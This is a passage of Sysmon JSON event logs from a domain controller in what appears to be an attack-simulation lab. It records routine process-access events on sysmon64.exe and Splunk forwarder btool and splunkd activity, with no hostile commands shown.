5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3525,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3526,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3527,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3528,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3529,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3530,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3531,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-001072830500}\r\nTargetProcessId: 880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.423","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-001072830500}","TargetProcessId":"880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3532,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.431\r\nProcessGuid: {41C8662E-1FF6-5F25-0000-00102D840500}\r\nProcessId: 4916\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF6-5F25-0000-001072830500}\r\nParentProcessId: 880\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.431","ProcessGuid":"{41C8662E-1FF6-5F25-0000-00102D840500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF6-5F25-0000-001072830500}","ParentProcessId":"880","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list replication_port --no-log","EventReceivedTime":"2020-08-01 07:55:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3533,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.423\r\nSourceProcessGUID: {41C8662E-1FF6-5F25-0000-001072830500}\r\nSourceProcessId: 880\r\nSourceThreadId: 672\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-00102D840500}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program 